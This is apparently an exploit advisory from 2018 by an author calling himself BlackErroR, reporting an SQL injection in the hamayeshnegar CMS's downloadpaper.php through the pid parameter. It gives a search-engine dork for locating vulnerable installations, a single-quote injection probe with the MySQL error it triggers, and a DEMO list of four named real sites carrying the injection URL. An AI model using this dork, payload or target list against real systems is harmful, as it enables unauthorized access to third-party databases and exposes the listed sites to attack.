[+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][+]
[+]Exploit : hamayeshnegar CMS - 'downloadpaper.php' SQL Injection [+]
[+]Exploit Author : BlackErroR [+]
[+]Telegram : @BlackErroR [+]
[+]Exploit Dork : intext:"( پورتال آنلاین مدیریت و داوری مجله ) " [+]
[+]Tested On : Win 7 - Firefox [+]
[+]VendorHomePage : http://www.hamayeshnegar.com/ [+]
[+]Date 2018/04/27 [+]
[+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-]
Example :
#target : http://site.ir/fa/
#Added : downloadpaper.php?pid=1'
#esult : You have an error in your SQL syntax; check the manual that corresponds
#to your MySQL server version for the right syntax to use near ''1''' at line 2
[+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-]
[+] [+]
[+]DEMO [+]
[+] [+]
[+]http://sanad.uast.ac.ir/fa/downloadpaper.php?pid=1' [+]
[+]http://j.pqprc.ac.ir/fa/downloadpaper.php?pid=1' [+]
[+]http://tellme.ir/fa/downloadpaper.php?pid=1' [+]
[+]http://elitesjournal.ir/fa/downloadpaper.php?pid=1' [+]
[+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][-][+][+]